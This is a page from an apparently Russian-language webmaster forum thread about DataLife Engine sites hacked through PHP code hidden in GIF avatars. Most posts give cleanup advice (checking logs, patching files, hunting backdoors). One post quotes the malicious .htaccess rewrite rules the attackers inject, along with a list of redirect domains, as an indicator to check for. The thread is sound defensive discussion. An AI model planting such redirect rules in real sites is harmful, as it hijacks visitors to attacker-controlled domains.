badu

Рейтинг
18
Регистрация
07.05.2011
И так, почему слетела лицензия, неизвестным образом конфиг стал пустой о_О Не могу понять как такое возможно, регу я запретил, все аватарки удалил с сайта, кроме моей (не гиф)... Можно ли узнать в чем причина?

Смотрите логи FTP и HTTP если в них ничего подозрительного нет, то ломают через хостера.

Или хостер восстанавливает "битый" бекап вашего сайта.

И если у вас нулл, то надо еще и прошерстить на наличие бекдоров весь движок.

Toxik:
Всем добрый день!!! Присоединяюсь к сообществу, поскольку вчера весь вечер потратил на прочтение всех 40-ка страниц темы и на решение проблемы. Всем спасибо за советы, помогли. Кстати у меня такого пользователя на сайте нету, заражен был где-то также в январе приблизительно, вчера только руки дошли... Не думал даже что все настолько масштабно.

Такой вопрос, сайты ломаются только те, которые на VPS или на хостинге тоже? Ато у меня сайт на впс пострадал, а тот, который на хостинге пока не тронут. Еще такой вопрос, я так понимаю, как работает эта славноизвестная гифка пока никому не ясно? А можно ли бекапнуть эту гифку после того, как она была удалена с сайта? Или это из раздела фантастики? )))) Еще раз всем спасибо за помощь!!!

Ломают через дыру в DLE это не зависит от хостинга.

В гиф'ке просто пхп код на внедрение вредоносного кода в ваши файлы(поиск и запись в файлы).

Видимо у всех различные способы, которыми вас взломали.

В каждом случае надо детально просмотреть и найти через что вас взломали.

Смотрите логи и даты изменения файлов.

Могу помочь если сами не знаете, что делать.

Помогу исправить уязвимость в ДЛЕ.

Master_globus:
А что мешает потом расшифровать?

Там двойной md5 - рашифровка займет перебором очень большое время.

Последние вести с фронтов.

Теперь еще изменяют файл .htaccess

RewriteCond %{QUERY_STRING} (^|&)noredirect=true(&|$)

RewriteRule ^ - [CO=mredir:0:%{HTTP_HOST},S]

RewriteCond %{HTTP:x-wap-profile} !^$ [OR]

RewriteCond %{HTTP:Profile} !^$

RewriteCond %{HTTP_HOST} !^m\.

RewriteCond %{HTTP:Cookie} !\smredir=0(;|$)

RewriteRule ^ http://$host/ [R,L]

В $host вставляется случайным образом выбранный домен из массива:

$domains = array('statuses.ws', 'live-internet.ws', 'googlecount.ws', 'livecountall.ws', 'googleinternet.ws', 'yacounter.ws', 'getinternet.ws', 'yandex-google.ws', 'ya-googl.ws', 'ya-analytics.ws', 'yadirect.ws');

Проверяйте свои сайты.

Master_globus:
Взломщик крадет пароли и отсылает их на ip

Там же хеши md5

Если вас взломали именно аватаром, то надо сделать вот это

/ru/forum/comment/11407417

вот в этих файлах

engine/inc/editusers.php

engine/modules/register.php

engine/modules/profile.php

Ким_иррр:
да там была эта хрень, перед этим я все файлы проверил, убрал но ничего не изменилось

Значит у вас "дыра" до сих пор не прикрыта, читайте ветку, там выше есть решение

Belomor:

Подскажите что это такое и как с этим бороться?

Если вы удалили "неправильные" картинки, то теперь уже сложно что-то сказать.

Если только посмотреть логи ftp на предмет обращения к ним.

Или логи апача именно по этим картинкам и сравнить их размеры.

Если размер изменился, то посмотреть что там делали у вас на сайте и кто.

Всего: 46